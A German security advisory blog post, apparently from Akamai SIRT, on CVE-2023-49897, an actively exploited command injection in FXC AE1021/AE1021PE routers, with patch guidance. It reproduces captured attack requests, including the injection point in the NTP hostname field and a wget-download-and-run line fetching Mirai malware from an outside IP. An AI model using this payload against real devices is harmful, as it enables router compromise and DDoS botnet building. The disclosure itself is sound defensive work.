Aktiv ausgenutzte Schwachstelle in FXC-Routern: Behoben, Patches verfügbar
Dieser Blogbeitrag ist ein Update zu einem früheren Beitrag des SIRT zur Kampagne InfectedSlurs .
Zusammenfassung
Das Akamai Security Intelligence Response Team (SIRT) hat ein Update zur InfectedSlurs-Kampagne veröffentlicht, da einer der betroffenen Anbieter Firmware-Updates und Empfehlungen veröffentlicht hat.
Der Sicherheitslücke wurde die folgende CVE-ID zugewiesen: CVE-2023-49897 mit einem CVSS-v3-Score von 8,0.
Zu den betroffenen Routern gehören Future X Communications (FXC) Netzwerkdosenrouter AE1021 und AE1021PE mit Firmware-Versionen 2.0.9 und früher.
Die im freien Internet erfassten bösartigen Payloads installieren eine Mirai-basierte Malware mit der Absicht, ein DDoS-Botnet (Distributed Denial of Service) zu erstellen.
Wir haben im ursprünglichen Beitrag eine umfangreiche Liste mit Indicators of Compromise (IOCs), Snort-Regeln und YARA-Regeln zur Identifizierung dieser Exploit-Versuche im freien Internet sowie möglicher aktiver Infektionen in geschützten Netzwerken bereitgestellt.
Was Sie wissen müssen
Im Rahmen der Entdeckung von InfectedSlurs hat SIRT eine Sicherheitslücke in den Netzwerkdosenroutern FXC AE1021 und AE1021PE gefunden, die im freien Internet aktiv ausgenutzt werden. Bei dem Gerät handelt es sich um einen netzwerkdosenbasierten drahtlosen LAN-Router, der für Hotels und Wohnungen entwickelt wurde. Es wird in Japan von FXC hergestellt. Dieser Sicherheitsanfälligkeit wurde die CVE-ID „CVE-2023-49897“ mit einem CVSS-v3-Score von 8,0 zugewiesen.
Die Sicherheitslücke ermöglicht es einem authentifizierten Angreifer, eine OS-Befehlsinjektion mit einer Payload zu erreichen, die über eine POST-Anfrage an die Verwaltungsschnittstelle gesendet wird. In seiner aktuellen Konfiguration setzt sie auf die Standardanmeldeinformationen des Geräts in den erfassten Payloads.
Die betroffenen Firmware-Versionen sind:
AE1021PE: Firmware-Version 2.0.9 und früher
AE1021: Firmware-Version 2.0.9 und früher
Der Anbieter (FXC) hat eine gepatchte Version der Firmware des Geräts veröffentlicht, die die Schwachstelle behebt. Der Hersteller empfiehlt, dass Gerätebesitzer so schnell wie möglich auf die Firmware-Version 2.0.10 aktualisieren. Außerdem wird empfohlen, das Gerät auf die Werkseinstellungen zurückzusetzen und das standardmäßige Anmeldekennwort für den Verwaltungsbildschirm beim ersten Start zu ändern.
Die Empfehlungen vom Anbieter finden Sie unter https://www.fxc.jp/news/20231206. Eine Empfehlung, die von JPCERT veröffentlicht wird, finden Sie hier: https://jvn.jp/en/vu/JVNVU92152057/ (Japanische Version: https://jvn.jp/vu/JVNVU92152057/).
Beobachteter Exploit
Die im freien Internet identifizierten Payloads beinhalten die Installation einer Mirai-basierten Malware. Die Kampagne baut ein Botnet auf, das DDoS-Angriffe erleichtern soll – das Botnet selbst wurde ausführlich in unserem ersten Beitrag behandelt.
Es ist schwer abzuschätzen, wie viele Geräte im freien Internet potenziell kompromittierbar oder aktiv kompromittiert sind, da die erfassten Angriffs-Payloads von der Verwendung der werkseitigen Anmeldedaten abhängig sind.
Da der Angreifer authentifiziert sein muss, wurden zwei eindeutige vom Angreifer generierte Interaktionen beobachtet. Wir glauben, dass die erste dieser Interaktionen lediglich ein Versuch des Fingerprinting ist. Die Interaktion zielt auf die Endpunkt-URL /cgi-bin/login.apply mit Standard-Zugangsdaten (Abbildung 1) ab.
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
Abb. 1: Authentifizierungsversuch für den FXC-Netzwerkdosenrouter
Wenn die Authentifizierung erfolgreich war, wird ungefähr drei Sekunden später eine Exploit-Payload an die Endpunkt-URL /cgi-bin/action gesendet (Abbildung 2).
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
Abb. 2: Exploit-Versuch für den FXC-Netzwerkdosenrouter
Die Raw-Exploit-Payloads, die im freien Internet erfasst wurden, versuchen die Schwachstelle der OS-Befehlsinjektion zu nutzen, um eine kompilierte MIPS-Variante Mirai zu verteilen (Abbildung 3).
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
Abb. 3: Payloads zur Remotecodeausführung, die im freien Internet beobachtet wurden
In unserer ersten Veröffentlichungstellte das SIRT-Team von Akamai eine umfangreiche Liste von IOCs, Snort-Regeln und YARA-Regeln bereit, um diese Exploit-Versuche im freien Internet sowie mögliche aktive Infektionen in geschützten Netzwerken zu identifizieren.
Fazit
Gezielte IoT-Kampagnen (Internet der Dinge) führen zu unzähligen Fällen, in denen alltägliche Endverbraucher unbeabsichtigt Opfer von schädlichen Angriffen werden. DDoS-Botnets und Kryptomining-Kampagnen sind nur einige der möglichen Ergebnisse, die dem Verbraucher, dessen Gerät betroffen ist, völlig unbemerkt passieren können. In einigen Fällen weiß der Nutzer möglicherweise gar nicht, dass die Anmeldedaten auf diesen Geräten geändert werden können.
Diese Enthüllung unterstreicht die Notwendigkeit, das Bewusstsein und die Aufklärung über die Best Practices des IoT und die damit verbundenen Risiken für den Durchschnittsverbraucher zu erhöhen. Die Notwendigkeit dieses Bewusstseins ist nicht ausschließlich an die Verbraucher gerichtet, sondern gilt auch für die Hersteller von Geräten, die einmal eingerichtet und dann sich selbst überlassen werden.
Grundlegende Sicherheitspraktiken sind wichtig
Die Grundlagen sind wichtig. Diese Beobachtungen betonen erneut die Bedeutung grundlegender Best Practices für die Sicherheit, wie z. B. das Ändern von Standardpasswörtern auf Geräten während der Ersteinrichtung. Sie heben auch hervor, wie wichtig es ist, noch strengere langfristige, proaktive Sicherheitsprotokolle zu implementieren, z. B. eine konsistente Aktualisierung der Systeme zum Schutz vor potenziellen Angriffen, und dass die Systeme/Geräte gelegentlich überprüft werden müssen, insbesondere wenn sie ungewöhnliche Verhaltensweisen aufweisen.
Wir halten Sie auf dem Laufenden
Die Akamai Security Intelligence Group wird Bedrohungen wie diese weiterhin überwachen und darüber berichten, um bei unseren Kunden und in der Sicherheits-Community insgesamt das Bewusstsein für die Gefahren zu schärfen. Wenn sie mehr aus der Bedrohungsforschung erfahren möchten, folgen Sie uns auf X(ehemals Twitter). Dort informieren wir über unsere neuesten Erkenntnisse.
Das Akamai SIRT dankt CISA, US-CERT, JPCERT und FXC herzlich für ihre Unterstützung bei der Kommunikation, Koordination, Identifizierung, Behebung und Offenlegung.
Wir möchten uns im Besonderen bedanken bei Ryu Kuki, Takayuki Sasaki und Katsunari Yoshioka von der Yokohama National University für die geleistete Arbeit. Obwohl wir nicht direkt mit ihnen zusammenarbeiten konnten, wurde uns mitgeteilt, dass sie die gleiche Sicherheitslücke ungefähr zur selben Zeit wie wir an JPCERT und FXC gemeldet hatten. Es ist immer wunderbar, Kollegen zu finden, die eine aktive Rolle dabei spielen, das Internet zu einem besseren und sichereren Ort für alle zu machen.
